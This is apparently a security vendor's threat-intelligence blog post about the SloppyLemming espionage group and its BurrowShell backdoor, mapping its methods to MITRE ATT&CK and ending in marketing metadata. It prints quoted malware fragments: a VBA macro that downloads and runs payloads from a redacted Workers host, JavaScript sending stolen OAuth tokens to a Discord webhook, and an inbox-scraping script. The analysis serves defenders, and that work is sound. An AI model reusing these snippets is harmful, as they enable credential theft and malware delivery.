SloppyLemming Attack Techniques & BurrowShell Backdoor Explained

Overview

SloppyLemming is a cyber-espionage group active since 2021. It targets government, energy, telecom, and technology sectors in Pakistan, Bangladesh, and Sri Lanka. The group uses custom malware, abuses Cloudflare Workers for C2, and gains access through spearphishing.

Known Aliases

Outrider Tiger
Fishing Elephant

Associated Malware or Tools

BurrowShell (shellcode backdoor)
Rust-based keylogger
CloudPhish (Credential theft utility for Cloudflare Workers)
Python-based web drivers

Techniques and TTPs (Mitre ATT&CK Mapping)

T1583.001 Acquire Infrastructure: Domains
T1587.001 Develop Capabilities: Malware
T1566.001 Phishing: Spearphishing Attachment
T1566.002 Phishing: Spearphishing Link
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1027.007 Obfuscated Files or Information: Dynamic API Resolution
T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
T1036.005 Masquerading: Match Legitimate Name or Location
T1574.001 Hijack Execution Flow: DLL Search Order Hijacking
T1056 Input Capture
T1082 System Information Discovery
T1560 Archive Collected Data
T1071.001 Application Layer Protocol: Web Protocols
T1041 Exfiltration Over C2 Channel

Detection and Prevention

SloppyLemming is a cyber-espionage group active since at least 2021. It targets telecommunications, energy, defense, and government sectors across South and East Asia, with a concentrated focus on Pakistan, Bangladesh, and Sri Lanka.

The group runs persistent, multi-stage attack campaigns. It builds its own malware, including the BurrowShell backdoor and a Rust-based keylogger. It abuses cloud platforms like Cloudflare Workers to host payloads, steal credentials, and manage command-and-control communications. It registers domains that mimic legitimate government agencies to deceive targets.

SloppyLemming gains initial access through spearphishing. It sends malicious Excel files with VBA macros, fake authentication portals, and blurred PDF lures. Once inside a network, it captures keystrokes, harvests credentials, collects email inbox data, and exfiltrates files back to its C2 servers.

This blog covers the group's major activities, the MITRE ATT&CK techniques it uses, and how you can simulate its attacks to validate your defenses.

Simulate APT Attacks with 14-Day Free Trial of Picus Platform

What Are the Major Activities of the SloppyLemming Group?

2021 (at least) – The group initiated its cyber-espionage operations across South and East Asia, with a primary focus being placed on the telecommunications, energy, defense, and government sectors in Pakistan, Bangladesh, and Sri Lanka [1].

Late 2022 – SloppyLemming began heavily abusing Cloudflare Workers, a serverless computing platform, to orchestrate malware delivery, command-and-control (C2) communications, and credential theft [2].

September 2024 – A large-scale credential harvesting operation was observed, wherein a custom-developed utility dubbed "CloudPhish" was utilized to fabricate deceptive webmail login portals designed to compromise defense and government personnel [2].

January 2025 – January 2026 – An extended cyber-espionage campaign was executed against critical infrastructure and government targets in Bangladesh and Pakistan, utilizing malicious documents to deploy the BurrowShell backdoor and a custom keylogger [1].

Which MITRE ATT&CK Techniques Are Used by SloppyLemming?

Tactic: Resource Development

T1583.001 Acquire Infrastructure: Domains

SloppyLemming registered and utilized over 112 Cloudflare Workers subdomains over an extended period. These domains were structurally designed to mimic authentic government agencies and organizations located within Pakistan and Bangladesh.

T1587.001 Develop Capabilities: Malware

SloppyLemming crafted specialized malware to facilitate its operations, which notably included an x64 in-memory shellcode implant called "BurrowShell" and a fully-featured Rust-based keylogger [1].

Additionally, operators employed a customized utility known as "CloudPhish," engineered specifically to dynamically assemble deceptive Cloudflare Worker scripts designed for credential theft [2].

Tactic: Initial Access

T1566.001 Phishing: Spearphishing Attachment

Operators initiated intrusions by dispatching spearphishing emails carrying Microsoft Excel spreadsheets with malicious macros to download malware.

T1566.002 Phishing: Spearphishing Link

Targets received emails with links pointing to fake authentication portals or blurred PDF lures.

The PDF lures displayed a "PDF reader is disabled" message with a "Download file" button. Clicking it triggered a ClickOnce application manifest download.

The actor also used a draft phishing template impersonating police IT departments, demanding users update their access credentials within 24 hours or face account suspension.

Tactic: Execution

T1059.005 Command and Scripting Interpreter: Visual Basic

Malicious Excel files contained VBA macros that downloaded two files: sppc.dll and audiodg.exe. After downloading, the macro ran audiodg.exe to begin the next stage [1].

Sub Main()

' Download sppc.dll
payloadURL = "https://<redacted>.workers.dev/favicon.ico"
savePath = Environ("ProgramData") & "\sppc.dll"
Download payloadURL, savePath, userAgent

' Download audiodg.exe
payloadURL = "https://<redacted>.workers.dev/audiodg.pdf"
savePath = Environ("ProgramData") & "\audiodg.exe"
Download payloadURL, savePath, userAgent

' Execute audiodg.exe
strCmd = Environ("ProgramData") & "\audiodg.exe"
ExecuteCmdAsync strCmd

End Sub

Tactic: Persistence

T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The malicious loader used by SloppyLemming wrote a registry entry under Software\Microsoft\Windows\CurrentVersion\Run, using the key name "OneDrive" to disguise the entry. This caused OneDrive.exe to launch automatically on every system reboot.

Tactic: Defense Evasion

T1027.007 Obfuscated Files or Information: Dynamic API Resolution

BurrowShell backdoor resolves Windows API functions at runtime by hashing function names and comparing against pre-stored values [1]. This blocks static analysis and defeats signature detection.

api_table[8] = ResolveByHash(a1, a2, 0xBDC96028, *api_table, v4, v5);
api_table[31] = ResolveByHash(a1, a2, 0x83E94598, *api_table, v6, v7);
api_table[32] = ResolveByHash(a1, a2, 0x830E924, *api_table, v8, v9);

T1027.013 Obfuscated Files or Information: Encrypted/Encoded File

The shellcode payload shipped as an RC4-encrypted blob named system32.dll. The loader decrypted it at runtime using the hardcoded 32-character key "boikztaigkuneapfvpesuabfmpxgwnad" before transferring execution [1].

T1036.005 Masquerading: Match Legitimate Name or Location

The actor renamed files to blend with Windows components. Malicious DLLs used names like mscorsvc.dll, sppc.dll, and system32.dll. One DLL was named Outlook.eml to disguise it as an email file.

C2 traffic also used a Windows Update User-Agent string to appear as routine system traffic.

T1574.001 Hijack Execution Flow: DLL

The actor used legitimate, digitally signed Microsoft binaries to load its malicious libraries.

For example, NGenTask.exe loaded mscorsvc.dll, a malicious DLL loader that decrypts and executes the BurrowShell shellcode. phoneactivate.exe loaded sppc.dll, a Rust-based keylogger with remote access capabilities.

In earlier campaigns, CamScanner 06-12-2024 15.29.pdf.exe loaded CRYPTSP.dll from a WinRAR archive exploiting CVE-2023-38831 [2].

Tactic: Credential Access

T1056 Input Capture

SloppyLemming deployed a Rust-based keylogger. The keylogger captured keystrokes including special keys such as [PGUP], [HOME], and [DEL].

It also established an OAuth interception flow to capture Google tokens and route them to a Discord webhook [2].

async function sendToDiscord(tokenData, userinfo) {
const data = {
content: `Captured OAuth Token:\n\`\`\`json\n${JSON.stringify(tokenData, null, 2)}\n\`\`\``
};
}

…

// OAuth flow

…

const tokenData = await tokenResponse.json();
await sendToDiscord(tokenData);

// Redirecting the user to a decoy PDF after capturing the token
const pdfUrl = 'https://<redacted>';
return Response.redirect(pdfUrl, 302);

Tactic: Discovery

T1082 System Information Discovery

The BurrowShell collected the computer name, logged-in username, system architecture, and admin rights status. It generated a unique device ID from this data using a custom formula.

This whole data is sent as JSON via HTTP POST to the endpoint /beta/deviceManagement/managedDevices of the C2 server to register the device.

Tactic: Collection

T1560 Archive Collected Data

SloppyLemming also deployed Python-based web drivers to automate inbox collection from compromised email accounts.

Here is the Python script used for this purpose [2]:

# Iterate through each email in the inbox
emails = driver.find_elements(By.CSS_SELECTOR, 'div[class="zA zE"]')
for email in emails:
# Click on the email
email.click()
# Search for attachments and click on download links
attachments = driver.find_elements(By.CSS_SELECTOR,
'a.AttLink[id^="zv_CLV_main_MSGC"][title="Download"]')
for attachment in attachments:
attachment.click()
# Go back to the Inbox
driver.execute_script("window.history.go(-1)")

Tactic: Command and Control

T1071.001 Application Layer Protocol: Web Protocols

Both Rust-based keylogger and BurrowShell communicated over HTTPS.

BurrowShell device registration payload sent via HTTP POST to /beta/deviceManagement/managedDevices:

// JSON Registration Payload

{
"device_id": 256947464,
"computer_name": "Example Computer",
"user_name": "michael",
"process_id": 1234,
"arch": "x64",
"os_info": "Windows",
"is_admin": true
}

A similar logic is used for keylogger’s device registration process.

After the registrations, the malware repeatedly sent POST requests with device_id to fetch the commands to be executed.

{ "tasks": [ { "command": "<COMMAND_TO_BE_EXECUTED>", "args": [] } ] }

Tactic: Exfiltration

T1041 Exfiltration Over C2 Channel

BurrowShell can capture screens, read files off disk and run commands. These are the functions used for data collection before exfiltrating it.

The Rust keylogger also can hook Windows input to capture keystrokes continuously and writes them to a local log.

The malwares sent collected data back via HTTP POST to dedicated C2 endpoints.

How Picus Simulates SloppyLemming Attacks?

We also strongly suggest simulating SloppyLemming Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for SloppyLemming:

Threat ID	Threat Name	Attack Module
71299	SloppyLemming Threat Group Campaign	Windows Endpoint

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

What Are the Aliases of the SloppyLemming Group?

SloppyLemming is also known as: Outrider Tiger, Fishing Elephant.

Key Takeaways

SloppyLemming is a cyber-espionage group active since at least 2021, targeting telecommunications, energy, defense, and government sectors across South and East Asia, with a primary focus on Pakistan, Bangladesh, and Sri Lanka.
The group abuses Cloudflare Workers to host payloads, steal credentials, and manage command-and-control (C2) communications, registering over 112 subdomains designed to mimic legitimate government agencies.
SloppyLemming builds its own malware, including the BurrowShell backdoor (an x64 in-memory shellcode implant) and a Rust-based keylogger that captures keystrokes and intercepts Google OAuth tokens.
Initial access relies on spearphishing: malicious Excel files with VBA macros, fake authentication portals, and blurred PDF lures that trick targets into downloading malicious payloads.
The group evades detection through dynamic API resolution, RC4-encrypted payloads, and file masquerading using names like mscorsvc.dll and system32.dll to blend in with legitimate Windows components.
To maintain persistence, SloppyLemming writes a registry entry under Software\Microsoft\Windows\CurrentVersion\Run using the key name "OneDrive," causing its loader to launch automatically on every system reboot.
Picus Threat Library includes a dedicated threat simulation for SloppyLemming (Threat ID 71299) under the Windows Endpoint attack module, allowing security teams to test their defenses against this group's tactics directly.

References

[1] A. W. Labs, “SloppyLemming Deploys BurrowShell and Rust-Based RAT to Target Pakistan and Bangladesh,” Arctic Wolf. Accessed: Mar. 16, 2026. [Online]. Available: https://arcticwolf.com/resources/blog/sloppylemming-deploys-burrowshell-and-rust-based-rat-to-target-pakistan-and-bangladesh/

[2] “Unraveling SloppyLemming’s operations across South Asia.” Accessed: Mar. 16, 2026. [Online]. Available: https://www.cloudflare.com/cloudforce-one/research/unraveling-sloppylemmings-operations-across-south-asia/

FAQ

Q: What is SloppyLemming?

A: SloppyLemming is a cyber-espionage group active since at least 2021. It targets telecommunications, energy, defense, and government sectors across South and East Asia, with a primary focus on Pakistan, Bangladesh, and Sri Lanka. The group is also known by the aliases Outrider Tiger and Fishing Elephant.

Q: How does SloppyLemming gain initial access to its targets?

A: SloppyLemming gains initial access through spearphishing. Attackers send malicious Excel files with VBA macros, links to fake authentication portals, and blurred PDF lures that display a "PDF reader is disabled" message. Clicking the download button triggers a ClickOnce application manifest, beginning the infection chain.

Q: What custom malware does SloppyLemming use?

A: SloppyLemming builds its own malware. Its primary tools are the BurrowShell backdoor, an x64 in-memory shellcode implant, and a Rust-based keylogger. The keylogger captures keystrokes and intercepts Google OAuth tokens, routing them to a Discord webhook. A separate utility called CloudPhish generates fake Cloudflare Worker scripts for credential theft.

Q: How does SloppyLemming avoid detection?

A: SloppyLemming uses dynamic API resolution to block static analysis, ships payloads as RC4-encrypted blobs, and renames malicious files to mimic legitimate Windows components like mscorsvc.dll and system32.dll. C2 traffic uses a Windows Update User-Agent string to blend in with routine system activity.

Q: How does SloppyLemming maintain persistence on infected systems?

A: The malicious loader writes a registry entry under Software\Microsoft\Windows\CurrentVersion\Run using the key name "OneDrive." This causes the loader to launch automatically on every system reboot, disguising the persistence mechanism as a legitimate OneDrive process.

Q: What role does Cloudflare Workers play in SloppyLemming's operations?

A: SloppyLemming registered over 112 Cloudflare Workers subdomains, structuring them to mimic legitimate government agencies in Pakistan and Bangladesh. The group uses these subdomains to host payloads, manage command-and-control communications, and run credential harvesting portals targeting defense and government personnel.

Q: How does Picus Security address the SloppyLemming threat?

A: Picus Threat Library includes a dedicated simulation for SloppyLemming under Threat ID 71299, available in the Windows Endpoint attack module. Security teams use this simulation to test their controls directly against SloppyLemming's tactics, techniques, and procedures, and receive actionable mitigation insights based on the results.

—----------—----------—----------BLOG ENDS HERE—----------—----------—----------

Hubspot Card

URL
Author	Picus Labs
Blog title	SloppyLemming Attack Techniques & BurrowShell Backdoor Explained
H2 Title
Meta Desc	Learn how SloppyLemming targets South Asia with spearphishing, custom malware, and Cloudflare abuse. Simulate their attacks to test your defenses.
Featured Image Alt Text	SloppyLemming
CTA Link	Free trial https://discover.picussecurity.com/start-your-free-trial

Promotion Card

Author	Picus Labs
Content Description	In this blog, we explained SloppyLemming in detail.
Takeaways	SloppyLemming
Level	ToFu
Type	Blog Post
Persona	All
Content Line	Red
Linked Contents	Various Picus contents are linked in the blog.
How should the sales team use this content? Briefly, what should be highlighted when promoting this piece of content?	-
Briefly, how can we market this content? What should be highlighted when promoting this piece of content? (Think for social media & Email marketing)	Threat Encyclopedia